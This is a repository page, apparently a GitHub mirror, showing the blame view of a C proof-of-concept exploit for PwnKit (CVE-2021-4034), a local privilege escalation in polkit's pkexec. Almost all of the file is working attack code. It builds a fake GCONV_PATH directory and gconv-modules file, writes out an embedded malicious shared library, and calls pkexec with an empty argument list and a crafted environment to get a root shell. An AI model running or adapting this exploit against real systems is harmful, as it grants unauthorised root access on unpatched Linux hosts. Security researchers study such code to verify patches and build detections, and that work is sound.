r3pek/CVE-2021-4034
1
0
Fork 0
mirror of https://github.com/arthepsy/CVE-2021-4034.git synced 2025-06-30 23:11:13 +01:00
Code Releases Activity
CVE-2021-4034/cve-2021-4034-poc.c

22 lines
914 B
C
Raw Normal View History

Header.
2022-01-26 01:09:51 +00:00
/*
* Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkits pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
* Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
*/
Add simple CVE-2021-4034 PoC
2022-01-26 00:59:53 +00:00
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
embed pwnkit.so (no gcc required anymore)
2022-01-27 17:33:51 +00:00
#include "pwnkit.so.inc"
Add simple CVE-2021-4034 PoC
2022-01-26 00:59:53 +00:00
int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
embed pwnkit.so (no gcc required anymore)
2022-01-27 17:33:51 +00:00
fp = fopen("pwnkit/pwnkit.so", "w+");
if (!fp) exit(-1);
fwrite(pwnkit_so, pwnkit_so_len, 1, fp);
Add simple CVE-2021-4034 PoC
2022-01-26 00:59:53 +00:00
fclose(fp);
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
Copy permalink